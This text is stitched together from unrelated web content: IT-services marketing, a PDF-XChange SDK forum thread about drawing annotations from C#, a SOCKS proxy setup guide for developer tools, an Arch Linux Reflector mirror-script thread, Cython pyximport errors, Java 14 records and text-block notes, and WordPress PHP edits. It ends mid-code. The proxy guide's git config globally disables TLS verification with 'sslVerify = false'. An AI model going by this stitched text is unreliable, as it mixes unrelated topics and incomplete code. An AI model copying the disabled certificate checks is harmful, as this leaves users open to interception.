Data Visualization with Python
XenonStack Data Visualization Services provides you with interactive products to visually communicate your data. Bring your data to life with our Real-Time Data Visualization dashboards. Data Visualization with Python uses widely used Visualization Packages like Matplotlib, Seaborn, ggplot, Altair, Bokeh, pygal, Plotly, geoplotlib and more.
Machine Learning As-A-Service
Unlock the value of your data to take smarter decisions. XenonStack Machine Learning Consulting Services helps in achieving Business Insights. Access the computational and storage infrastructure and tools required to accelerate work in Deep Learning. Stay a step ahead of disruption and exceed customer expectation by implementing Predictive Analytics Solutions.
|
Hello!
I used to draw a rectangle of a certain color and thickness in PDF Viewer using annotations (with the JavaScript function addAnnot()).
Could I simply draw a rectangle with any function of the PDF-Tools Library or should I also create an Annotation with the PXCp_Add3DAnnotationW() function? The problem is I'm trying to use only the PDF-Tools in order to manipulate a PDF-Document.
Thanks for any answers!
Hi!
I have some questions on the PXCp_AddLineAnnotationW function:
1. The last parameter of the function is a pointer to a PXC_CommonAnnotInfo structure. It expects among other things an integer value for a color. Here is an extract from the docs with pseudo code:
Code: Select all
AnnotInfo.m_Color = RGB(200, 0, 100);
I couldn't find any equivalent of that function in WPF. How is that value calculated? RGB(255, 255, 255) = 16777215 ???
2. A comprehension question: should I draw four single lines in order to create a rectangle, or can I directly draw a rectangle with that function (with the parameter LPCPXC_RectF rect that specifies the bounding rectangle of the annotation)?
This is an extract from my code (I didn't define the values for AnnotInfo.m_Border.m_DashArray). No annotation is created; I tested it with the JavaScript command this.getAnnots(0), and it returns null.
Code: Select all
var borderRect = new PdfXchangePro.PXC_RectF { left = selection.Left,
right = selection.Right,
top = selection.Top,
bottom = selection.Bottom };
int color = 16777215; // RGB(255, 255, 255) ???
var border = new PdfXchangePro.PXC_AnnotBorder { m_Width = StrToDouble(BorderThickness),
m_Type = PdfXchangePro.PXC_AnnotBorderStyle.ABS_Solid };
var borderInfo = new PdfXchangePro.PXC_CommonAnnotInfo{ m_Color = color,
m_Flags = Convert.ToInt32(PdfXchangePro.PXC_AnnotsFlags.AF_ReadOnly),
m_Opacity = _opacity,
m_Border = border };
var startPoint = new PdfXchangePro.PXC_PointF {x = selection.Left, y = selection.Top};
var endPoint = new PdfXchangePro.PXC_PointF {x = selection.Right, y = selection.Bottom};
int retval = PdfXchangePro.PXCp_AddLineAnnotationW(_handle,
0,
ref borderRect,
"xy",
"yx",
ref startPoint,
ref endPoint,
PdfXchangePro.PXC_LineAnnotsType.LAType_None,
PdfXchangePro.PXC_LineAnnotsType.LAType_None,
color,
ref borderInfo); // function returns 0
Thanks!
Site Admin
Can you send me the PDF generated by your code?
P.S. RGB is a macro, equivalent to the following function:
Code: Select all
// r, g, and b in range from 0 to 255
ULONG _RGB(int r, int g, int b)
{
return (ULONG)(r + g * 256 + b * 65536);
}
Tracker Software (Project Director)
When attaching files to any message - please ensure they are archived and posted as a .ZIP, .RAR or .7z format - or they will not be posted - thanks.
I've got it! I had to close the document in the PDF viewer before creating a line annotation with PDF Tools Library function PXCp_AddLineAnnotationW!
I still don't understand whether I can create a rectangle as one annotation or I have to construct it generating 4 single lines? The third parameter (LPCPXC_RectF rect) in this function is according to the documentation a bounding rectangle of the
annotation. What is the use of it?
One more question. Is it possible to suppress the pop-up annotation dialog that appears after a double-click on the annotation? Are there any parameter in the PXCp_AddLineAnnotationW function to manage it. I've only found the flag PXC_AnnotsFlags.AF_ReadOnly of the PXC_CommonAnnotInfo class, that makes the line annotation (or the annotation bounding rectangle?) read-only.
Tracker Supp-Stefan
Hi Relapse,
It is definitely possible with the low level functions, but unfortunately the only High Level ones are for adding annotations - not for deleting them.
Best,
Stefan
Tracker Supp-Stefan
Hello relapse,
As mentioned before - there are no high level functions that will allow you to delete annotations.
So you will need to read on annotations in the PDF Reference:
http://wwwimages.adobe.com/www.adobe.co ... ce_1-7.pdf
section 8.4 Annotations in the above document
or section 12.4 Annotations in the ISO version of the file:
http://wwwimages.adobe.com/www.adobe.co ... 0_2008.pdf
And then utilize the low level functions described in
3.2.5 PDF Dictionary Functions of our PDF Tools SDK manual to read and manipulate the annotations dictionary as needed.
Alternatively - you could use JS while you have the files opened in the Viewer AX. This should be quite a lot easier to implement, and will still allow you to create/edit/delete annotations as needed.
Best,
Stefan
Tracker
Tracker Supp-Stefan
Hi Relapse,
There are some snippets inside the manual, but there isn't anything more complex - as those are low level functions giving you access to the very structure of the PDF File and the way you would like to use such methods will greatly vary from case to case. You will need to get yourself acquainted with the PDF specification to be able to use those successfully.
Best,
Stefan
I do read the PDF specification.
I cannot understand how it is possible to access the Annotations dictionary of a certain page.
I've found the function PXCp_ObjectGetDictionary, but it needs an object handle. Where can I get it?
Tracker Supp-Stefan
Hi relapse,
You might want to use functions like PXCp_llGetObjectByIndex to obtain an object first, and then here is the sample from the manual for using the PXCp_ObjectGetDictionary function:
Code: Select all
// Retrieve object's dictionary
HPDFOBJECT hObject;
...
HPDFDICTIONARY hDict;
hr = PXCp_ObjectGetDictionary(hObject, &hDict);
if (IS_DS_FAILED(hr))
{
// report error
...
}
Stefan
I try to use the PXC_Rect function in order to draw a real rectangle and not an annotation.
HRESULT PXC_Rect(
_PXCContent* content,
double left,
double top,
double right,
double bottom
);
Parameters
content [in] Parameter content specifies the identifier for the page content to which the function will be applied.
What is this identifier for the page content and how can I get it?
Thanks!
Tracker Supp-Stefan
Hi Relapse,
This method is from the PXCLIB40 set of functions - those are aimed at creating new PDF document from scratch - so you can not use that to just add a rectangle to an already existing page I am afraid.
Otherwise - you can see how the content identifier is to be set up in the sample projects in
C:\Program Files\Tracker Software\PDF-XChange PRO 4 SDK\Examples\SDKExamples\<<YOUR Programming language>>\PDFXCDemo
Best,
Stefan
Thanks, Stefan, your patience is honorable.
Is there any difference between
HRESULT PXCp_Init(PDFDocument* pObject, LPCSTR Key, LPCSTR DevCode);
and
HRESULT PXC_NewDocument(_PXCDocument** pdf, LPCSTR key, LPCSTR devCode);
? Are both parameters PDFDocument* pObject and _PXCDocument** pdf identical?
I've tried to mix the use of both libraries:
Code: Select all
int pageContentIdentifier;
int pdfHandle;
int pdfPage = 0;
PdfXchangePro.PXCp_Init(out pdfHandle, PdfXchangePro.SerialNumber, PdfXchangePro.DevelopmentCode);
PdfXchangePro.PXCp_ReadDocumentW(pdfHandle, _tempFile, 0);
PdfXchange.PXC_GetPage(pdfHandle, pdfPage, out pageContentIdentifier);
PdfXchange.PXC_Rect(pdfHandle, 20, 100, 100, 20);
but I've got an AccessViolationException executing the PXC_GetPage function.
I've also found no function to delete a newly created (with PXC_Rect) graphical object, or is it not possible at all?
Tracker Supp-Stefan
Hi Relapse,
I am afraid you can't mix methods from the two libraries. You will need to create and save a PDF file using the PXC_ methods, and then open it and modify it using the PXCp_ ones.
As PXC_ methods are designed for building up PDF files, there are no delete methods: you are creating a PDF file or page starting from an empty one and only adding the components you want.
Best,
Stefan
Yesterday I managed to draw the rectangle I needed, but the restriction is that it must be a new PDF document. It's a pity!
Now I'm trying to delete line annotations directly in the dictionaries. By the way, I can create a line annotation of any thickness with the function PXCp_AddLineAnnotationW; there is no such limit of 20 points as in JS. But I very much miss examples for handling the dictionaries. I've found an example in the forum http://www.tracker-software.com/forum3/ ... nnotationW but it's in C++ and I'm fighting with the translation of the low-level functions' declarations into C#.
Tracker Supp-Stefan
Hello Relapse,
Glad to hear that you got it working. And great to hear there are no width limitations with the PXCp_AddLineAnnotationW method.
As for samples for handling dictionaries - I am afraid that I can't help - any samples would probably be in the PDF Specification itself.
Best,
Stefan
The best advice here is to look at the C# wrappers for other projects. It is important to use the proper marshalling for types like BSTR and LPWSTR (from C# "string" types). If you look at function declarations for DLL imports in C#, you'll often see a function argument prefixed by something like:
[MarshalAs(UnmanagedType.LPWStr)]
sometype somefunction([MarshalAs(UnmanagedType.LPWStr)] string InputLPWSTR);
UnmanagedType has a lot of members (LPWStr, BStr, etc) that you can specify for different scenarios. Check MSDN for details or use autocomplete in Visual Studio to see a list.
Also note the "ref" and "out" keywords, which are used when the API function takes a pointer. "ref" means C# requires the value to be initialized before the call; "out" means it may be uninitialized and is expected to be set by the function.
E.g. C++:
HRESULT calculate_property_of_mystruct(mystruct* input, int* output);
would be imported into C# with:
... calculate_property_of_mystruct(ref mystruct input, out int output);
Lots of reading here:
http://msdn.microsoft.com/en-us/library/26thfadc.aspx
http://msdn.microsoft.com/en-us/library/fzhhdwae.aspx
|
1 git
If you can't pull a repo from GitHub, the following settings may help:
[http]
proxy = "socks5://127.0.0.1:1091"
sslVerify = false
postBuffer = 524288000
lowSpeedLimit = 0
lowSpeedTime = 999999
[https]
proxy = "socks5://127.0.0.1:1091"
sslVerify = false
postBuffer = 524288000
lowSpeedLimit = 0
lowSpeedTime = 999999
[core]
symlinks = true
gitProxy = 'socks5://127.0.0.1:1091'
Add this to the ~/.gitconfig file to make it a global configuration.
2 Python
Python's urllib can automatically use the proxy specified by environment variables. Set it up as follows:
import os
os.environ['HTTP_PROXY'] = '127.0.0.1:1093'
os.environ['HTTPS_PROXY'] = '127.0.0.1:1093'
Note that this needs to be added before urllib is imported.
Additionally, for the pip install tool's proxy settings, if you use socks5 you need to install pysocks first:
pip install pysocks
Then add the proxy parameter when running pip:
pip install --proxy='socks5://127.0.0.1:1091' numpy
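If you also need to go through the proxy from your own Python code (not just pip), here is a minimal hedged sketch using the requests library; it assumes requests[socks] is installed, and the target URL is only a placeholder:
import requests

proxies = {
    "http": "socks5://127.0.0.1:1091",
    "https": "socks5://127.0.0.1:1091",
}
# every request routed through the local SOCKS proxy
r = requests.get("https://www.example.com", proxies=proxies, timeout=10)
print(r.status_code)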
3 Cargo
Cargo is Rust's package manager; you need to modify Cargo's configuration file:
[http]
proxy = "socks5://127.0.0.1:1091"
[https]
proxy = "socks5://127.0.0.1:1091"
For a global change, edit the ~/.cargo/config file. For the current project only, edit $ProjRoot/.cargo/config; create it if it does not exist.
4 Flutter
For Flutter, you can modify $FlutterRoot/bin/flutter.bat|flutter and add the following as the first line:
REM for windows
set https_proxy=socks5://127.0.0.1:1091
# for *nix
export https_proxy="socks5://127.0.0.1:1091"
Since Flutter uses Dart's infrastructure, you can also modify $FlutterRoot/bin/cache/dart-sdk/pub.bat|pub, again adding this as the first line:
REM for windows
set https_proxy=socks5://127.0.0.1:1091
# for *nix
export https_proxy="socks5://127.0.0.1:1091"
5 Android Studio Gradle
Find the $PROJ/gradle.properties file and add the following configuration:
systemProp.https.proxyHost=127.0.0.1
systemProp.https.proxyPort=1093
6 hg
[http_proxy]
host=127.0.0.1:1093
user=username
passwd=password
~/.hgrc for *nix, ~/mercurial.ini for windows
7 npm
npm config set proxy http://127.0.0.1:1093
npm config set https-proxy http://127.0.0.1:1093
8 Others
Tools that use the system HTTP client are handled the same way as Flutter.
|
Stupid question: how are people using reflector?
I just run it manually every so often (I'm sure there are better ways) followed by the pacman command you mentioned:
[notme@nothere bin]$ cat update-mirrors.sh
mv /etc/pacman.d/mirrorlist /etc/pacman.d/mirrorlist.backup
reflector -l 15 --sort rate --save /etc/pacman.d/mirrorlist
diff /etc/pacman.d/mirrorlist /etc/pacman.d/mirrorlist.backup
Last edited by chr0nik (2011-11-13 02:25:48)
Stupid question: how are people using reflector?
I don't use it directly. I have a fixed mirrorlist for syncing the database. When I upgrade the system with powerpill-light, it uses Reflector at run-time to get a list of the most up-to-date mirrors for parallel downloads.
Nice script, thanks Xyne.
What about putting the command used to generate the file in the generated file?
Done.
# Arch Linux mirrorlist generated by Reflector
# With: /usr/bin/reflector -l 5
# When: 2012-03-10 19:46:34 UTC
# From: https://www.archlinux.org/mirrors/status/json/
# Retrieved: 2012-03-10 19:46:34 UTC
# Last Check: 2012-03-10 18:54:32 UTC
Server = ftp://ftp.las.ic.unicamp.br/pub/archlinux/$repo/os/$arch
Server = http://www.las.ic.unicamp.br/pub/archlinux/$repo/os/$arch
Server = ftp://ftp.tku.edu.tw/Linux/ArchLinux/$repo/os/$arch
Server = ftp://mirrors.uk2.net/pub/archlinux/$repo/os/$arch
Server = http://ftp.tku.edu.tw/Linux/ArchLinux/$repo/os/$arch
I'm in the same boat as ddffnn, and would like a --sort=score option. Could this be considered for inclusion in reflector? I have a patch for it here.
Awesome, thanks!
The "score" sort option is sorting by highest score, but lower is better.
# Arch Linux mirrorlist generated by Reflector
# With: /usr/bin/reflector -c 'United States' --sort score
# When: 2012-03-24 21:13:32 UTC
# From: https://www.archlinux.org/mirrors/status/json/
# Retrieved: 2012-03-24 21:13:32 UTC
# Last Check: 2012-03-24 20:40:29 UTC
Server = ftp://lug.mtu.edu/archlinux/ftpfull/$repo/os/$arch
Server = http://lug.mtu.edu/archlinux/ftpfull/$repo/os/$arch
Server = http://archlinux.tserver.net/$repo/os/$arch
Server = http://archlinux.supsec.org/$repo/os/$arch
Server = ftp://ftp.osuosl.org/pub/archlinux/$repo/os/$arch
Server = http://mirrors.gigenet.com/archlinux/$repo/os/$arch
Server = http://ftp.osuosl.org/pub/archlinux/$repo/os/$arch
Server = ftp://mirror.us.leaseweb.net/archlinux/$repo/os/$arch
Server = ftp://mirror.ancl.hawaii.edu/linux/archlinux/$repo/os/$arch
Server = http://mirror.us.leaseweb.net/archlinux/$repo/os/$arch
Server = http://mirror.yellowfiber.net/archlinux/$repo/os/$arch
Server = http://mirrors.lax1.thegcloud.com/arch//$repo/os/$arch
Server = http://mirror.ancl.hawaii.edu/linux/archlinux/$repo/os/$arch
Server = ftp://archlinux.supsec.org/pub/linux/arch/$repo/os/$arch
Server = http://mirror.umd.edu/archlinux/$repo/os/$arch
Server = ftp://cosmos.cites.illinois.edu/pub/archlinux/$repo/os/$arch
Server = http://cosmos.cites.illinois.edu/pub/archlinux/$repo/os/$arch
Server = http://mirrors.rutgers.edu/archlinux/$repo/os/$arch
Server = ftp://mirrors.xmission.com/archlinux/$repo/os/$arch
Server = http://mirrors.xmission.com/archlinux/$repo/os/$arch
Server = ftp://locke.suu.edu/linux/dist/archlinux/$repo/os/$arch
Server = ftp://cake.lib.fit.edu/archlinux/$repo/os/$arch
Server = http://mirrors.liquidweb.com/archlinux/$repo/os/$arch
Server = http://archlinux.surlyjake.com/archlinux/$repo/os/$arch
Server = ftp://ftp.gtlib.gatech.edu/pub/archlinux/$repo/os/$arch
Server = http://www.gtlib.gatech.edu/pub/archlinux/$repo/os/$arch
Server = http://cake.lib.fit.edu/archlinux/$repo/os/$arch
Server = ftp://ftp.archlinux.org/$repo/os/$arch
Server = http://mirror.mocker.org/archlinux/$repo/os/$arch
Server = ftp://mirror.rit.edu/archlinux/$repo/os/$arch
Server = http://mirror.ece.vt.edu/archlinux/$repo/os/$arch
Server = http://mirrors.us.kernel.org/archlinux/$repo/os/$arch
Server = http://mirror.rit.edu/archlinux/$repo/os/$arch
Last edited by mrman (2012-03-24 21:19:20)
When doing; export LANG=C ; reflector --list-countries
I get this;
Reflector.MirrorStatusError: "failed to retrieve mirror data: time data '2012-03-26T10:20:01Z' does not match format '%Y-%m-%d %H:%M:%S'"
I've got swedish date and time settings if that might be the fault? (And just reinstalled reflector as well)
Nice script !
Just a small typo in the help, a "Limit" is missing for the --grep option. Also, when trying to save on a location without permission (typically /etc/pacman.d/mirrorlist without being root), the exception is not correctly handled and itself throws an exception.
I would propose something like :
@@ -336,7 +336,7 @@
help='Return the n fastest mirrors that meet the other criteria.')
filters.add_argument('--grep', dest='grep', metavar='<regex>', action='append',
- help=' the list to URLs that match at least one of the given regular expressions.')
+ help='Limit the list to URLs that match at least one of the given regular expressions.')
filters.add_argument('-l', '--latest', dest='latest', type=int, metavar='n',
help='Limit the list to the n most recently synchronized servers.')
@@ -416,7 +416,7 @@
f.write(mirrorlist)
f.close()
except IOError as e:
- stderr.write(e)
+ stderr.write('error: %s\n' % e.strerror)
exit(1)
else:
print(mirrorlist)
Mirror Script that I don't quite have running correctly.
#!/bin/bash
## Written by MedianMajik.
find /etc/pacman.d/ -type f -name "mirrorlist.*" -printf '%A+ \n' -print0 -delete
find /etc/pacman.d/ -type f -name "mirrorlist" -printf 'mv "%h/%f" "%h/%f.SAF\n"' ;
reflector -c "United States" -a 1 -f 6 --sort rate --save /etc/pacman.d/mirrorlist
diff /etc/pacman.d/mirrorlist /etc/pacman.d/mirrorlist.SAF >> /etc/pacman.d/mirror.log
pacman -Syy
echo "Available packages for @box as of `date +%c`" > /etc/pacman.d/package.log
pacman -Qu >> /etc/pacman.d/package.log
Standard Output and Standard Error
mv "/etc/pacman.d/mirrorlist" "/etc/pacman.d/mirrorlist.SAF
"Traceback (most recent call last):
File "/usr/bin/reflector", line 5, in <module>
Reflector.main()
File "/usr/lib/python3.2/site-packages/Reflector.py", line 405, in main
ms, mirrors = process_options(options)
File "/usr/lib/python3.2/site-packages/Reflector.py", line 378, in process_options
mirrors = ms.sort(mirrors, 'rate')
File "/usr/lib/python3.2/site-packages/Reflector.py", line 164, in sort
mirrors = self.rate(mirrors)
File "/usr/lib/python3.2/site-packages/Reflector.py", line 224, in rate
q_in.join()
File "/usr/lib/python3.2/queue.py", line 82, in join
self.all_tasks_done.wait()
File "/usr/lib/python3.2/threading.py", line 235, in wait
waiter.acquire()
KeyboardInterrupt
/home/js/.scripts/update-mirrors.sh: line 7: /etc/pacman.d/mirror.log: Permission denied
warning: database file for 'extra' does not exist
error: you cannot perform this operation unless you are root.
/home/js/.scripts/update-mirrors.sh: line 9: /etc/pacman.d/package.log: Permission denied
/home/js/.scripts/update-mirrors.sh: line 10: /etc/pacman.d/package.log: Permission denied
One thing at a time
@medianmajik
What is the script doing and what do you expect it to do?
All I see is that you are killing it with a KeyboardInterrupt, which is not a bug. I could update the code to catch that and avoid the tracedump, but that would only be a cosmetic change.
Btw, you shouldn't use "pacman -Syy" in a script unless you update the system immediately afterward. It can break the system. Example:
pacman -Syy
# some time later
pacman -S <some library>
Now only the library has been updated without updating packages that depend on it. Those packages depend on the old version and will no longer work. If this affects a critical package, the system will be unusable. There is a thread somewhere on the forum that goes into detail about this.
Look at the way paconky handles update detection. You can also use an alternative database with pacman ("pacman -b /some/temporary/path ...") but you will need to copy or symlink in the local database.
I'm facing some problem
reflector -f 10 --save /tmp/mirrorlist
Exception in thread Thread-3:
Traceback (most recent call last):
File "/usr/lib/python3.2/threading.py", line 740, in _bootstrap_inner
self.run()
File "/usr/lib/python3.2/threading.py", line 693, in run
self._target(*self._args, **self._kwargs)
File "/usr/lib/python3.2/site-packages/Reflector.py", line 281, in worker
l = len(f.read())
File "/usr/lib/python3.2/http/client.py", line 496, in read
s = self._safe_read(self.length)
File "/usr/lib/python3.2/http/client.py", line 590, in _safe_read
chunk = self.fp.read(min(amt, MAXAMOUNT))
File "/usr/lib/python3.2/socket.py", line 276, in readinto
return self._sock.recv_into(b)
socket.timeout: timed out
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python3.2/threading.py", line 740, in _bootstrap_inner
self.run()
File "/usr/lib/python3.2/threading.py", line 693, in run
self._target(*self._args, **self._kwargs)
File "/usr/lib/python3.2/site-packages/Reflector.py", line 281, in worker
l = len(f.read())
File "/usr/lib/python3.2/http/client.py", line 496, in read
s = self._safe_read(self.length)
File "/usr/lib/python3.2/http/client.py", line 590, in _safe_read
chunk = self.fp.read(min(amt, MAXAMOUNT))
File "/usr/lib/python3.2/socket.py", line 276, in readinto
return self._sock.recv_into(b)
socket.timeout: timed out
Exception in thread Thread-4:
Traceback (most recent call last):
File "/usr/lib/python3.2/threading.py", line 740, in _bootstrap_inner
self.run()
File "/usr/lib/python3.2/threading.py", line 693, in run
self._target(*self._args, **self._kwargs)
File "/usr/lib/python3.2/site-packages/Reflector.py", line 280, in worker
with urllib.request.urlopen(req, None, self.connection_timeout) as f:
File "/usr/lib/python3.2/urllib/request.py", line 138, in urlopen
return opener.open(url, data, timeout)
File "/usr/lib/python3.2/urllib/request.py", line 369, in open
response = self._open(req, data)
File "/usr/lib/python3.2/urllib/request.py", line 387, in _open
'_open', req)
File "/usr/lib/python3.2/urllib/request.py", line 347, in _call_chain
result = func(*args)
File "/usr/lib/python3.2/urllib/request.py", line 1155, in http_open
return self.do_open(http.client.HTTPConnection, req)
File "/usr/lib/python3.2/urllib/request.py", line 1140, in do_open
r = h.getresponse()
File "/usr/lib/python3.2/http/client.py", line 1049, in getresponse
response.begin()
File "/usr/lib/python3.2/http/client.py", line 346, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.2/http/client.py", line 308, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
File "/usr/lib/python3.2/socket.py", line 276, in readinto
return self._sock.recv_into(b)
socket.timeout: timed out
The version is the latest
Name : reflector
Version : 2012.7.15-1
URL : http://xyne.archlinux.ca/projects/reflector
Licenses : GPL
I think it needs some fix. I'll look at it.
Last edited by TheSaint (2012-07-26 14:54:33)
do it good first, it will be faster than do it twice the saint
Just THANK YOU
do it good first, it will be faster than do it twice the saint
Thanks a lot. This script is a life saver.
However, it has the unfortunate bug of requiring the existence of $HOME/.cache in order to run.
Also, where are the sources for your programs? It would be very helpful if I could see what could
have caused the problem.
Thanks,
Gesh
Sorry. Reading through Reflector.py I found that it reads XDG_CACHE_HOME which for some
reason is set on my computer. Unsetting it makes the problems vanish.
Gesh
I'm new and might be doing something wrong but when executing the command
# reflector --verbose -l 5 --sort rate --save /etc/pacman.d/mirrorlist
I get the following error
[root@archbang ~]# reflector --verbose -l 5 --sort rate --save /etc/pacman.d/mirrorlist
error: failed to cache JSON data ([Errno 2] No such file or directory: '/root/.cache/mirrorstatus.json')
Let me know what information I can give that can help problemsolve.
Have you tried running reflector as a regular user with sudo?
I did run the command you used as root and it worked fine.
I'm new and might be doing something wrong but when executing the command
# reflector --verbose -l 5 --sort rate --save /etc/pacman.d/mirrorlist
I get the following error
[root@archbang ~]# reflector --verbose -l 5 --sort rate --save /etc/pacman.d/mirrorlist
error: failed to cache JSON data ([Errno 2] No such file or directory: '/root/.cache/mirrorstatus.json')
Let me know what information I can give that can help problemsolve.
If only you were running Arch, we could help you.
Nothing is too wonderful to be true, if it be consistent with the laws of nature -- Michael Faraday
Sometimes it is the people no one can imagine anything of who do the things no one can imagine. -- Alan Turing
---
How to Ask Questions the Smart Way
<Insert smarta$$ response here>
$ uname -r
3.6.10-1-ARCH
$ sudo did the trick thanks for the tip karol
|
import pyximport
pyximport.install(pyimport=True, build_dir='xx')
import six
Traceback (most recent call last):
File "a.py", line 4, in <module>
import six
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 419, in load_module
return load_module(fullname, source_path, so_path=so_path, is_package=is_package)
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 233, in load_module
exec("raise exc, None, tb", {'exc': exc, 'tb': tb})
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 216, in load_module
mod = imp.load_dynamic(name, so_path)
File "six.py", line 805, in init six
_add_doc(reraise, """Reraise an exception.""")
ImportError: Building module six failed: ["NameError: name 'reraise' is not defined\n"]
Changing import six to import requests produces another error:
Traceback (most recent call last):
File "a.py", line 4, in <module>
import requests
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 419, in load_module
return load_module(fullname, source_path, so_path=so_path, is_package=is_package)
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 233, in load_module
exec("raise exc, None, tb", {'exc': exc, 'tb': tb})
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 216, in load_module
mod = imp.load_dynamic(name, so_path)
File "__init__.py", line 43, in init requests.__init__
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 419, in load_module
return load_module(fullname, source_path, so_path=so_path, is_package=is_package)
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 233, in load_module
exec("raise exc, None, tb", {'exc': exc, 'tb': tb})
File "/Users/anlong/Library/Python/2.7/lib/python/site-packages/pyximport/pyximport.py", line 216, in load_module
mod = imp.load_dynamic(name, so_path)
File "__init__.py", line 8, in init urllib3.__init__
ImportError: Building module requests failed: ["ImportError: Building module urllib3 failed: ['ValueError: Attempted relative import in non-package\\n']\n"]
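A hedged workaround sketch for the errors above: installing pyximport without pyimport=True leaves ordinary .py packages such as six and requests to the normal import machinery and only compiles .pyx files (the build_dir value just mirrors the snippet above):
import pyximport

# only *.pyx modules go through Cython; plain .py imports stay untouched
pyximport.install(build_dir='xx')

import six       # loaded by the regular importer
import requests  # likewise, so the relative-import failure no longer occurs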
I did notice that project too. Sounds interesting. Currently it says: This code is in initial stages of development. It is present only for familiarization with the project.
Looking forward to see what they come up with. Having an optimizing JIT which is faster than LLVM would be very nice :)
|
Java 14 notes
Now a standard feature
Friendly reminder: currently only IDEA 2020.1 EAP and later support all of the new features in Java 14, so please use the latest version (the link currently points to the 2020.1 EAP build; once the final release is out, you can download the stable version)!
Switch expressions were added in Java 12, became a preview feature in Java 13, and became standard in Java 14, i.e. an official feature.
For an introduction to text blocks, see this article.
Java 14 builds on the text blocks of Java 13 and adds two escape sequences: \ and \s.
Example:
var code = """
public void print($type o){
System.out.println(Objects.toString(o));
}
""".replace("$type", "abc");
// Output: "public void print(abc o){\n System.out.println(Objects.toString(o));\n}\n"
You can see that the output contains the newline character \n.
var code = """
public void print($type o){\
System.out.println(Objects.toString(o));\
}\
""".replace("$type", "abc");
// Output: "public void print(abc o){ System.out.println(Objects.toString(o));}"
Notice that the newlines have been removed, and there is no trailing whitespace at the end of the text block either.
var code = """
public void print($type o){\
Sy\stem.out.println(Objects.toString(o));\
}\
""".replace("$type", "abc");
// Output: "public void print(abc o){ Sy tem.out.println(Objects.toString(o));}"
In the output the newlines are removed, but a space has been added after the "Sy" of System (via \s); you can clearly see the extra space in the output.
When I moved the site to SSL earlier there was a problem: the image and video links in posts are all absolute paths (including the full domain name). If you change the domain, or switch from plain HTTP to SSL, you have to replace all of the non-SSL addresses.
For example, the plain address is http://www.bckf.cn ; if posts contain many links like this, visiting over https will produce errors.
Besides replacing them directly in the database, another option is to handle it in the editor (the editor settings only affect articles written afterwards; older articles can only be fixed through the database).
Back up the relevant files before making any changes!
1. Blog root directory/wp-admin/includes/ajax-actions.php
1.1 In the wp_ajax_query_attachments() function
Below the line
$posts = array_filter( $posts );
add the following:
foreach($posts as &$el){
$newurl=str_replace(home_url(),"",$el['url']);
$el['url']=$newurl; //str_replace(home_url(),"",$el["url"]);
$el['sizes']['full']['url']=$newurl;
$el['sizes']['medium']['url']=str_replace(home_url(),"",$el['sizes']['medium']['url']);
$el['sizes']['thumbnail']['url']=str_replace(home_url(),"",$el['sizes']['thumbnail']['url']);
$el['sizes']['large']['url']=str_replace(home_url(),"",$el['sizes']['large']['url']);
}
unset($el); // destroy the reference held by $el.
1.2 The wp_ajax_send_attachment_to_editor() function
Below the line
$html = apply_filters( 'media_send_to_editor', $html, $id, $attachment );
add:
$html=str_replace(home_url(),"",$html);
2. Blog root directory/wp-admin/includes/media.php:
At the first line of the
media_send_to_editor( $html )
function, add:
$html=str_replace(home_url(),"",$html);
Java 14 adds Records as a preview feature. Preview means it may change in later JDK versions, or it may become a permanent feature.
A Record is similar to an enum, except that a Record is a semi-immutable class. In many places a Record can be used just like a class.
Brief summary of its characteristics:
Define a User record:
record User(String name, int age){ }
The body can be left completely empty.
A Record can be used just like a class, as follows:
var dur=new User("tea2",20);
var acs=new User("tea2",20);
System.out.println(dur.name());
System.out.println(dur.age());
System.out.println(dur.equals(acs));
System.out.println(acs.age());
System.out.println(acs.name());
Here dur and acs can only have their fields initialized through the constructor. equals is generated automatically, so two records can be compared directly for equality.
Inside a Record you can add static fields, static instances and static methods:
record User(String name, int age){
public User {
callNumber++;
}
private static int callNumber;
static int getCallNumber(){
return callNumber;
}
}
Usage:
var dur=new User("tea2",20);
var acs=new User("tea2",20);
System.out.println(User.getCallNumber());
The constructor can be written in two forms, and you can perform all kinds of validation inside it.
In IDEA you can convert between the two forms with a quick action (the original post shows screenshots):
Java 14 Record: compact constructor converted to a canonical constructor:
Java 14 Record: canonical constructor converted to a compact constructor:
record User(String name, int age){
public User(String name, int age) {
// perform various validation checks.
if(age<20){
throw new IllegalArgumentException("age小于20.");
}
callNumber++;
this.name = name;
this.age = age;
}
private static int callNumber;
static int getCallNumber(){
return callNumber;
}
}
record User(String name, int age){
public User {
// perform validation checks.
if(age<20){
throw new IllegalArgumentException("age小于20.");
}
callNumber++;
}
private static int callNumber;
static int getCallNumber(){
return callNumber;
}
}
Generics can be defined like this:
record MobilePhone<T>(T phone, double price){
}
Then define a Record and an ordinary class:
record HuaWei(){
private static final String name="Huawei";
private static final String model="mate 20 pro";
public String name(){
return name;
}
public String model(){
return model;
}
}
class XiaoMi{
private static final String name="Xiaomi";
private static final String model="9";
public String name(){
return name;
}
public String model(){
return model;
}
}
Usage:
var huaWeiMobilePhone=new MobilePhone(new HuaWei(),6000);
var xiaomiMobilePhone=new MobilePhone(new XiaoMi(),6100);
System.out.println(huaWeiMobilePhone.phone().name());
System.out.println(xiaomiMobilePhone.phone().name());
System.out.println(huaWeiMobilePhone.toString());
System.out.println(xiaomiMobilePhone.toString());
Output:
Huawei Xiaomi MobilePhone[phone=HuaWei[], price=6000.0] MobilePhone[phone=cn.bckf.java14demo.XiaoMi@25f38edc, price=6100.0]
As you can see, the ordinary class and the Record only differ slightly in the implementation of toString().
record User(String name, int age) implements Serializable {
}
static void write(User user, String filePath) {
try (var oos = new ObjectOutputStream(Files.newOutputStream(Paths.get(filePath)))) {
oos.writeObject(user);
} catch (IOException e) {
e.printStackTrace();
}
}
static User read(String filePath) {
User user = null;
try (var oos = new ObjectInputStream(Files.newInputStream(Paths.get(filePath)))) {
